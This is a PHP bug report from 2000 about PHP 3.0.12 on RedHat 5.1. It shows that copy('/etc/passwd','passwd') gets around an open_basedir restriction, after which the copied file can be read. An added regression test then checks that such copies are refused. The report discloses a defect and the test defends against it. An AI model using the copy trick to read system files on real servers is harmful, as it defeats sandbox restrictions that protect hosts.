Bug #3454 Allows access to any directory on server
Submitted: 2000-02-11 07:38 UTC
Modified: 2005-03-31 16:13 UTC
From: norikd at usa dot net
Assigned:
Status: Wont fix
Package: Other
PHP Version: 3.0.12
OS: RedHat 5.1
Private report: No
CVE-ID: None
 [2000-02-11 07:38 UTC] norikd at usa dot net
php3.ini as follows

safe_mode=1
safe_mode_exec_string=/www/sites/mysite/cgi-bin
doc_root=/www/sites/mysite
open_basedir=/www/sites/mysite
extension=pgsql.so  

test.php3
<?php

copy("/etc/passwd","passwd");  /* this works */
$fd=fopen("passwd","r");           /* so does this */
fclose($fd);                             /* and this */

$fd=fopen("/etc/passwd","r");  /* this is not successful */
fclose($fd);                           /* as it should not be */

?>    

So the system will allow me to copy the passwd file to a local allowed directory and then open it, which bypasses the fact that I have restricted the system with the open_basedir directive.

thanks

 [2005-03-31 16:13 UTC] php-bugs at lists dot php dot net
We are sorry, but we do not support PHP 3 related problems anymore.
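
A regression check for the behaviour reported above, as an added example that is not part of the original report or of PHP's own code: it applies an open_basedir restriction at runtime and verifies that copy() is refused when its source lies outside the allowed directory, just as fopen() is. It assumes PHP 7 or later, run from the command line as a saved script file with no open_basedir already configured; the function name and the temporary sandbox directory are constructed for this example.

```php
<?php
// Added example, not code from the bug report.
// Assumptions: PHP >= 7.0 CLI, script saved as a file, no open_basedir set yet.

function open_basedir_checks(): array
{
    // Constructed sandbox standing in for /www/sites/mysite.
    $sandbox = sys_get_temp_dir() . '/obd_' . bin2hex(random_bytes(4));
    if (!mkdir($sandbox, 0700)) {
        throw new RuntimeException('could not create sandbox directory');
    }
    $sandbox = realpath($sandbox);

    // This script lives outside the sandbox, so it plays the role of /etc/passwd.
    $outside = __FILE__;
    if (!is_readable($outside)) {
        throw new RuntimeException('run this from a saved, readable script file');
    }
    $inside = $sandbox . '/copy.txt';

    // open_basedir can be tightened (never loosened) at runtime since PHP 5.3.
    if (ini_set('open_basedir', $sandbox) === false) {
        throw new RuntimeException('could not set open_basedir');
    }

    $results = [
        // Direct read of an outside file: the case that was blocked in the report.
        'fopen_outside_blocked'       => @fopen($outside, 'r') === false,
        // Outside source, inside destination: the case the report says succeeded.
        'copy_outside_source_blocked' => @copy($outside, $inside) === false,
        // A refused copy must not leave a file behind in the sandbox.
        'no_copy_left_in_sandbox'     => !file_exists($inside),
        // Control: ordinary writes inside the sandbox must still work.
        'write_inside_allowed'        => @file_put_contents($sandbox . '/ok.txt', 'x') === 1,
    ];

    // Clean up what is still reachable under the restriction.
    @unlink($inside);
    @unlink($sandbox . '/ok.txt');
    @rmdir($sandbox);

    return $results;
}

foreach (open_basedir_checks() as $name => $passed) {
    printf("%-30s %s\n", $name, $passed ? 'PASS' : 'FAIL');
}
```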